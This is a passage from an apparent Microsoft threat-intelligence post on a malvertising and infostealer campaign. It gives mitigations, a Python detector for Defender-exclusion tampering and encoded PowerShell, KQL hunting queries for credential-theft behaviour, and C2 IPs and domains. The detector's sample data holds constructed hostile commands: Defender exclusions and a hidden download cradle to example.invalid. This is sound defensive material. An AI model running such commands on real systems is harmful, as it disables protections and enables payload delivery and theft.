tools<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"strengthen-operating-environment-configuration\">Strengthen operating environment configuration<\/h3>\n<ul class=\"wp-block-list\">\n<li>Require <a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/admin\/security-and-compliance\/set-up-multi-factor-authentication\">multifactor authentication (MFA)<\/a>. While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats. 
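\n<p>The Defender exclusion tampering shown in Figure 5 and the Base64-encoded PowerShell stage that follows it both leave their full command lines in process-creation telemetry, which is what the tamper protection and obfuscated-script recommendations above are there to catch. The decoding step is the part that ad-hoc triage most often gets wrong, because <em>-EncodedCommand<\/em> (and the <em>-e<\/em>, <em>-ec<\/em> and <em>-enc<\/em> short forms powershell.exe accepts) carries Base64 over UTF-16LE, not UTF-8. The following Python script is an added example and is not code from the Microsoft post or from the Storm-0408 tooling. It runs over a few constructed process-creation records (tab-separated timestamp, host, image and command line, with made-up hostnames, user names, paths and the <em>example.invalid<\/em> URL), decodes any encoded-command argument, and tags Defender exclusion additions, exclusions under user-writable directories, Defender features being switched off, and download cradles.<\/p>

```python
"""Flag Defender-exclusion tampering and download cradles in PowerShell
command lines, including ones hidden behind -EncodedCommand."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


def encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


# Constructed sample process-creation records (not campaign telemetry):
# timestamp <TAB> host <TAB> image <TAB> command line. Hostnames, user
# names, paths and the example.invalid URL are made up for this example.
SAMPLE_EVENTS = '\n'.join([
    '2024-12-05T10:01:02Z\tWS01\tpowershell.exe\tpowershell.exe -NoProfile -EncodedCommand '
    + encode_powershell(r"Add-MpPreference -ExclusionPath 'C:\Users\alice\AppData\Local\Temp'; "
                        r"Add-MpPreference -ExclusionPath 'C:\ProgramData\svc'"),
    '2024-12-05T10:01:09Z\tWS01\tpowershell.exe\tpowershell.exe -w hidden -enc '
    + encode_powershell("$c = New-Object Net.WebClient; "
                        "$d = $c.DownloadData('https://example.invalid/stage2.txt')"),
    '2024-12-05T10:02:00Z\tWS02\tpowershell.exe\tpowershell.exe -Command "Add-MpPreference '
    r"-ExclusionPath 'C:\Program Files\Backup'" + '"',
    '2024-12-05T10:03:00Z\tWS03\tpowershell.exe\tpowershell.exe -Command Get-Date',
])

# Any unambiguous prefix of -EncodedCommand that powershell.exe accepts.
ENCODED_FLAG = re.compile(r'(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)
# Add-MpPreference / Set-MpPreference adding an exclusion of any kind.
EXCLUSION_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b[^;\n]*?-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(['\"]?)([^'\";,\n]+)\2", re.I)
# Set-MpPreference switching off a protection feature.
DISABLE_RE = re.compile(r'Set-MpPreference\b[^;\n]*?-Disable\w+\s+(?:\$true|1)\b', re.I)
# Common download cradles.
CRADLE_RE = re.compile(r'Net\.WebClient|Download(?:String|Data|File)|Invoke-WebRequest|'
                       r'\biwr\b|Invoke-RestMethod|Start-BitsTransfer', re.I)
# Exclusion roots that any user (or any process) can write to.
USER_WRITABLE = re.compile(r'\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)(?:\\|$)', re.I)


@dataclass
class Finding:
    host: str
    timestamp: str
    script: str                      # command as analysed (decoded if it was encoded)
    tags: List[str] = field(default_factory=list)
    exclusions: List[str] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmdline: str) -> Tuple[str, List[str], List[str]]:
    """Classify one PowerShell command line; returns (script, tags, exclusions)."""
    tags, exclusions = set(), []
    decoded = decode_encoded_command(cmdline)
    script = cmdline if decoded is None else decoded
    if decoded is not None:
        tags.add('encoded-command')
    for m in EXCLUSION_RE.finditer(script):
        kind, value = m.group(1).lower(), m.group(3).strip()
        exclusions.append(value)
        tags.add('defender-exclusion-' + kind)
        if kind == 'path' and USER_WRITABLE.search(value):
            tags.add('exclusion-in-user-writable-path')
    if DISABLE_RE.search(script):
        tags.add('defender-feature-disabled')
    if CRADLE_RE.search(script):
        tags.add('download-cradle')
    return script, sorted(tags), exclusions


def scan_events(log_text: str) -> List[Finding]:
    """Run the classifier over tab-separated process-creation records."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, image, cmdline = line.split('\t', 3)
        if image.lower() not in ('powershell.exe', 'pwsh.exe'):
            continue
        script, tags, exclusions = analyze_command(cmdline)
        if tags:
            findings.append(Finding(host, ts, script, tags, exclusions))
    return findings


if __name__ == '__main__':
    for f in scan_events(SAMPLE_EVENTS):
        print(f.timestamp, f.host, ', '.join(f.tags))
        for path in f.exclusions:
            print('    exclusion:', path)
```

<p>To run it over real telemetry, map <em>Timestamp<\/em>, <em>DeviceName<\/em>, <em>FileName<\/em> and <em>ProcessCommandLine<\/em> from <em>DeviceProcessEvents<\/em> onto the four tab-separated fields; the decoder and the tagging rules do not depend on the log source. The user-writable path list is the part to extend with locations specific to your environment, and a record tagged <em>encoded-command<\/em> together with <em>defender-exclusion-path<\/em> is worth an alert on its own, since legitimate administration rarely hides an exclusion change behind Base64.<\/p>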
<\/li>\n<li>Implement&nbsp;Entra ID&nbsp;<a href=\"https:\/\/learn.microsoft.com\/azure\/active-directory\/authentication\/concept-authentication-strengths\">Conditional Access authentication strength<\/a>&nbsp;to require phishing-resistant authentication for employees and external users for critical apps.<\/li>\n<li>Encourage users to use Microsoft Edge and other web browsers that support <a href=\"https:\/\/learn.microsoft.com\/deployedge\/microsoft-edge-security-smartscreen\">Microsoft Defender SmartScreen<\/a>, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.<\/li>\n<li>Enable&nbsp;<a href=\"https:\/\/learn.microsoft.com\/previous-versions\/windows\/it-pro\/windows-server-2008-R2-and-2008\/cc753488%28v=ws.11%29\" target=\"_blank\" rel=\"noreferrer noopener\">Network Level Authentication<\/a> for Remote Desktop Service connections.<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/defender-endpoint\/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem\" target=\"_blank\" rel=\"noreferrer noopener\">Enable<\/a> Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.&nbsp;<\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/windows\/security\/application-security\/application-control\/windows-defender-application-control\/applocker\/applocker-overview\" target=\"_blank\" rel=\"noreferrer noopener\">AppLocker<\/a>&nbsp;can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-defender-xdr-detections\">Microsoft Defender XDR detections<\/h2>\n<p>Microsoft Defender XDR customers can refer to the list of applicable detections below. 
Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.<\/p>\n<p>Customers with provisioned access can also use <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-in-microsoft-365-defender\">Microsoft Security Copilot in Microsoft Defender<\/a> to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-antivirus\">Microsoft Defender Antivirus<\/h3>\n<p>Microsoft Defender Antivirus detects threat components as the following malware:<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-endpoint\">Microsoft Defender for Endpoint<\/h3>\n<p>The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.<\/p>\n<ul class=\"wp-block-list\">\n<li>Possible theft of passwords and other sensitive web browser information<\/li>\n<li>Possible Lumma Stealer activity<\/li>\n<li>Renamed AutoIt tool<\/li>\n<li>Use of living-off-the-land binary to run malicious code<\/li>\n<li>Suspicious startup item creation<\/li>\n<li>Suspicious Scheduled Task Process Launched<\/li>\n<li>Suspicious DPAPI Activity<\/li>\n<li>Suspicious implant process from a known emerging threat<\/li>\n<li>Security software tampering<\/li>\n<li>Suspicious activity linked to a financially motivated threat actor detected<\/li>\n<li>Ransomware-linked threat actor detected<\/li>\n<li>A file or network connection related to a ransomware-linked emerging threat activity group detected<\/li>\n<li>Information stealing malware activity<\/li>\n<li>Possible NetSupport Manager activity<\/li>\n<li>Suspicious sequence of exploration activities<\/li>\n<li>Defender detection bypass<\/li>\n<li>Suspicious Location of Remote Management 
Software<\/li>\n<li>A process was injected with potentially malicious code<\/li>\n<li>Process hollowing detected<\/li>\n<li>Suspicious PowerShell download or encoded command execution<\/li>\n<li>Suspicious PowerShell command line<\/li>\n<li>Suspicious behavior by cmd.exe was observed<\/li>\n<li>Suspicious Security Software Discovery<\/li>\n<li>Suspicious discovery indicative of Virtualization\/Sandbox Evasion<\/li>\n<li>A process was launched on a hidden desktop<\/li>\n<li>Monitored keystrokes<\/li>\n<li>Suspicious Process Discovery<\/li>\n<li>Suspicious Javascript process<\/li>\n<li>A suspicious file was observed<\/li>\n<li>Anomaly detected in ASEP registry<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-cloud\">Microsoft Defender for Cloud<\/h3>\n<p>The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.<\/p>\n<ul class=\"wp-block-list\">\n<li>Detected suspicious combination of HTA and PowerShell<\/li>\n<li>Suspicious PowerShell Activity Detected<\/li>\n<li>Traffic detected from IP addresses recommended for blocking<\/li>\n<li>Attempted communication with suspicious sinkholed domain<\/li>\n<li>Communication with suspicious domain identified by threat intelligence<\/li>\n<li>Detected obfuscated command line<\/li>\n<li>Detected suspicious named pipe communications<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-security-copilot\">Microsoft Security Copilot<\/h2>\n<p>Security Copilot customers can use the standalone experience to <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/prompting-security-copilot#create-your-own-prompts\">create their own prompts<\/a> or run the following <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/using-promptbooks\">pre-built promptbooks<\/a> to automate incident response or investigation tasks related to this threat:<\/p>\n<ul class=\"wp-block-list\">\n<li>Incident 
investigation<\/li>\n<li>Microsoft User analysis<\/li>\n<li>Threat actor profile<\/li>\n<li>Threat Intelligence 360 report based on MDTI article<\/li>\n<li>Vulnerability impact assessment<\/li>\n<\/ul>\n<p>Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.<\/p>\n<h2 class=\"wp-block-heading\" id=\"threat-intelligence-reports\">Threat intelligence reports<\/h2>\n<p>Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-threat-intelligence\">Microsoft Defender Threat Intelligence<\/h3>\n<p>Microsoft Security Copilot customers can also use the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&amp;toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti\">Microsoft Security Copilot integration<\/a> in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/using-copilot-threat-intelligence-defender-xdr\">embedded experience<\/a> in the Microsoft Defender portal to get more information about this threat actor.<\/p>\n<h2 class=\"wp-block-heading\" id=\"hunting-queries\">Hunting queries<\/h2>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-xdr\">Microsoft Defender XDR<\/h3>\n<p>Microsoft Defender XDR customers can run the following query to find related activity in their networks:<\/p>\n<p><strong>Github-hosted first-stage payload certificate serial 
numbers<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"34\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet specificSerialNumbers = dynamic([\"70093af339876742820d7941\", \"15042512e67e8275f3f7f36b\", \"5608cab7e2ce34d53abcbb73\", \"0fa27d2553f24da79d1cc6bd8773ee9a\", \"7a7bf2ae0cbc0f5500db2946\", \"30d6c83a715bddb32e7956fe52d6b352\", \"301385aa36fae635e74bb88e\", \"30013cbbb16a7fd3c57f82707fb99c32\", \"5d00264a6b804ae6b28d9b16\", \"3a9c76f8304f77bd271921d9982f1ab6\", \"01f2c6c363767056abd80e9c\", \"0b09c88c0c8d15bed51a9eb4440f4bb0\"]); union\n( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp\n),\n( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate\n)\n<\/pre>\n<\/div>\n<p><strong>Dropbox-hosted first-stage payload certificate serial number<\/strong><\/p>\n<p>Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. 
This query will search for the unique serial number of the known certificate related to this activity.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"23\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet specificSerialNumbers = dynamic([\"7a7bf2ae0cbc0f5500db2946\"]); union\n( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp\n),\n( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate\n)\n<\/pre>\n<\/div>\n<p><strong>Second-stage C2 IP addresses<\/strong><\/p>\n<p>Surface devices that may have communicated with second stage C2 IP addresses related to this activity. The union is declared <em>isfuzzy=true<\/em> so that tables that exist only in a Microsoft Sentinel workspace (for example <em>AzureDiagnostics<\/em>, <em>Heartbeat<\/em>, and <em>AADNonInteractiveUserSignInLogs<\/em>) are skipped rather than failing the query when it is run from the Defender portal. The IP list is a dynamic array, so each column is matched with <em>in ()<\/em>; comparing a string column to the array with <em>==<\/em> never matches, and in the two-column legs the reported address is the one that actually matched rather than the first non-empty column.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"60\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet ipAddressToSearch = dynamic([\"159.100.18.192\", \"192.142.10.246\", \"79.133.46.35\", \"84.200.24.191\", \"84.200.24.26\", \"89.187.28.253\", \"185.92.181.1\"]);\nunion isfuzzy=true\n( AzureDiagnostics | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AzureDiagnostics\", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)\n),\n( IdentityQueryEvents | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch) | project Timestamp, Table = \"IdentityQueryEvents\", IPAddress = iff(DestinationIPAddress in (ipAddressToSearch), DestinationIPAddress, IPAddress), AdditionalInfo = Query\n),\n( AADSignInEventsBeta | where IPAddress in (ipAddressToSearch) | project Timestamp, Table = \"AADSignInEventsBeta\", IPAddress, AdditionalInfo = UserAgent\n),\n( Heartbeat | where ComputerIP in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"Heartbeat\", IPAddress = ComputerIP, AdditionalInfo = OSName\n),\n( CloudAppEvents | where IPAddress in (ipAddressToSearch) | project Timestamp, Table = \"CloudAppEvents\", IPAddress, AdditionalInfo = UserAgent\n),\n( DeviceNetworkEvents | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch) | project Timestamp, Table = \"DeviceNetworkEvents\", IPAddress = iff(RemoteIP in (ipAddressToSearch), RemoteIP, LocalIP), AdditionalInfo = InitiatingProcessCommandLine\n),\n( AADUserRiskEvents | where IpAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AADUserRiskEvents\", IPAddress = IpAddress, AdditionalInfo = RiskEventType\n),\n( AADNonInteractiveUserSignInLogs | where IPAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AADNonInteractiveUserSignInLogs\", IPAddress, AdditionalInfo = UserAgent\n),\n( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"MicrosoftAzureBastionAuditLogs\", IPAddress = iff(ClientIpAddress in (ipAddressToSearch), ClientIpAddress, TargetVMIPAddress), AdditionalInfo = UserAgent\n)\n| sort by Timestamp desc\n<\/pre>\n<\/div>\n<p><strong>Fourth-stage C2 IP addresses<\/strong><\/p>\n<p>Surface devices that may have communicated with fourth stage C2 IP addresses related to this activity. The query has the same shape as the second-stage query above, with the fourth-stage address list.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"57\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet ipAddressToSearch = dynamic([\"45.141.84.60\", \"91.202.233.18\", \"154.216.20.131\", \"5.10.250.240\", \"79.132.128.77\"]);\nunion isfuzzy=true\n( 
AzureDiagnostics | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AzureDiagnostics\", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)\n),\n( IdentityQueryEvents | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch) | project Timestamp, Table = \"IdentityQueryEvents\", IPAddress = iff(DestinationIPAddress in (ipAddressToSearch), DestinationIPAddress, IPAddress), AdditionalInfo = Query\n),\n( AADSignInEventsBeta | where IPAddress in (ipAddressToSearch) | project Timestamp, Table = \"AADSignInEventsBeta\", IPAddress, AdditionalInfo = UserAgent\n),\n( Heartbeat | where ComputerIP in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"Heartbeat\", IPAddress = ComputerIP, AdditionalInfo = OSName\n),\n( CloudAppEvents | where IPAddress in (ipAddressToSearch) | project Timestamp, Table = \"CloudAppEvents\", IPAddress, AdditionalInfo = UserAgent\n),\n( DeviceNetworkEvents | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch) | project Timestamp, Table = \"DeviceNetworkEvents\", IPAddress = iff(RemoteIP in (ipAddressToSearch), RemoteIP, LocalIP), AdditionalInfo = InitiatingProcessCommandLine\n),\n( AADUserRiskEvents | where IpAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AADUserRiskEvents\", IPAddress = IpAddress, AdditionalInfo = RiskEventType\n),\n( AADNonInteractiveUserSignInLogs | where IPAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"AADNonInteractiveUserSignInLogs\", IPAddress, AdditionalInfo = UserAgent\n),\n( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch) | project Timestamp = TimeGenerated, Table = \"MicrosoftAzureBastionAuditLogs\", IPAddress = iff(ClientIpAddress in (ipAddressToSearch), ClientIpAddress, TargetVMIPAddress), AdditionalInfo = UserAgent\n)\n| sort by Timestamp desc\n<\/pre>\n<\/div>\n<p><strong>Browser remote debugging<\/strong><\/p>\n<p>Identify AutoIT scripts launching chromium-based browsers (such as <em>chrome.exe<\/em>, <em>msedge.exe<\/em>, <em>brave.exe<\/em>) in remote debugging mode. A browser started with <em>--remote-debugging-port<\/em> exposes the DevTools protocol on a local port, which lets the launching process read cookies and site data through the running browser instead of decrypting them from the profile files on disk. The query matches on the version-info internal file name so that a renamed AutoIt interpreter is still caught.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"21\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceProcessEvents\n| where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\" \/\/ AutoIt scripts, even if the interpreter is renamed.\n| where ProcessCommandLine has \"--remote-debugging-port\" \/\/ Chromium-based browsers (chrome.exe, msedge.exe, brave.exe, etc.) launched in remote debugging mode.\n| project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine\n<\/pre>\n<\/div>\n<p><strong>DPAPI decryption via AutoIT<\/strong><\/p>\n<p>Identify DPAPI decryption activity originating from AutoIT scripts. The <em>DpapiAccessed<\/em> event records the DPAPI operation (<em>SPCryptUnprotect<\/em>) together with the data description the owning application stored with the blob, which is how the query ties the decryption to Chrome or Edge.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"22\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceEvents\n| where ActionType == \"DpapiAccessed\"\n| where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\"\n| where (AdditionalFields has_any(\"Google Chrome\", \"Microsoft Edge\") and AdditionalFields has_any(\"SPCryptUnprotect\"))\n| extend json = parse_json(AdditionalFields)\n| extend dataDesp = tostring(json.DataDescription.PropertyValue)\n| extend opType = tostring(json.OperationType.PropertyValue)\n| where (dataDesp in~ (\"Google Chrome\", \"Microsoft Edge\") and opType =~ \"SPCryptUnprotect\")\n| project 
Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType\n<\/pre>\n<\/div>\n<p><strong>DPAPI decryption via LOLBAS binaries<\/strong><\/p>\n<p>Identify DPAPI decryption activity originating from LOLBAS binaries (<em>RegAsm.exe<\/em> and <em>MSBuild.exe<\/em>).<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"23\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nDeviceEvents\n| where ActionType == \"DpapiAccessed\"\n| where InitiatingProcessFileName has_any (\"RegAsm.exe\", \"MSBuild.exe\")\n| where (AdditionalFields has_any(\"Google Chrome\", \"Microsoft Edge\") and AdditionalFields has_any(\"SPCryptUnprotect\"))\n| extend json = parse_json(AdditionalFields)\n| extend dataDesp = tostring(json.DataDescription.PropertyValue)\n| extend opType = tostring(json.OperationType.PropertyValue)\n| where (dataDesp in~ (\"Google Chrome\", \"Microsoft Edge\") and opType =~ \"SPCryptUnprotect\")\n| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType\n<\/pre>\n<\/div>\n<p><strong>Sensitive browser file access via AutoIT<\/strong><\/p>\n<p>Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"26\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet browserDirs = pack_array(@\"\\Google\\Chrome\\User Data\\\", @\"\\Microsoft\\Edge\\User Data\\\", @\"\\Mozilla\\Firefox\\Profiles\\\"); let browserSensitiveFiles = pack_array(\"Web Data\", \"Login Data\", \"key4.db\", \"formhistory.sqlite\", \"cookies.sqlite\", \"logins.json\", \"places.sqlite\", 
\"cert9.db\");\nDeviceEvents\n| where AdditionalFields has_any (\"FileOpenSource\") \/\/ Filter for \"File Open\" events.\n| where InitiatingProcessVersionInfoInternalFileName == \"AutoIt3.exe\"\n| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields)\n| extend File_Name = tostring(json.FileName.PropertyValue)\n| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))\n| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name\n<\/pre>\n<\/div>\n<p><strong>Sensitive browser file access via LOLBAS binaries<\/strong><\/p>\n<p>Identify LOLBAS binaries (<em>RegAsm.exe<\/em> and <em>MSBuild.exe<\/em>) accessing sensitive browser files.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"27\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; notranslate\" title>\nlet browserDirs = pack_array(@\"\\Google\\Chrome\\User Data\\\", @\"\\Microsoft\\Edge\\User Data\\\", @\"\\Mozilla\\Firefox\\Profiles\\\"); let browserSensitiveFiles = pack_array(\"Web Data\", \"Login Data\", \"key4.db\", \"formhistory.sqlite\", \"cookies.sqlite\", \"logins.json\", \"places.sqlite\", \"cert9.db\");\nDeviceEvents\n| where AdditionalFields has_any (\"FileOpenSource\") \/\/ Filter for \"File Open\" events.\n| where InitiatingProcessFileName has_any (\"RegAsm.exe\", \"MSBuild.exe\") | where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles)) | extend json = parse_json(AdditionalFields)\n| extend File_Name = tostring(json.FileName.PropertyValue)\n| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))\n| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, 
InitiatingProcessCommandLine, File_Name\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-sentinel\">Microsoft Sentinel<\/h3>\n<p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the <a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/sentinel-solutions-deploy\">Microsoft Sentinel Content Hub<\/a> to have the analytics rule deployed in their Sentinel workspace.<\/p>\n<h2 class=\"wp-block-heading\" id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p><strong>Streaming website domains with malicious iframe<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>movies7[.]net<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>0123movie[.]art<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malicious iframe redirector domains<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>fle-rvd0i9o8-moo[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>0cbcq8mu[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malvertisement distributor<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table 
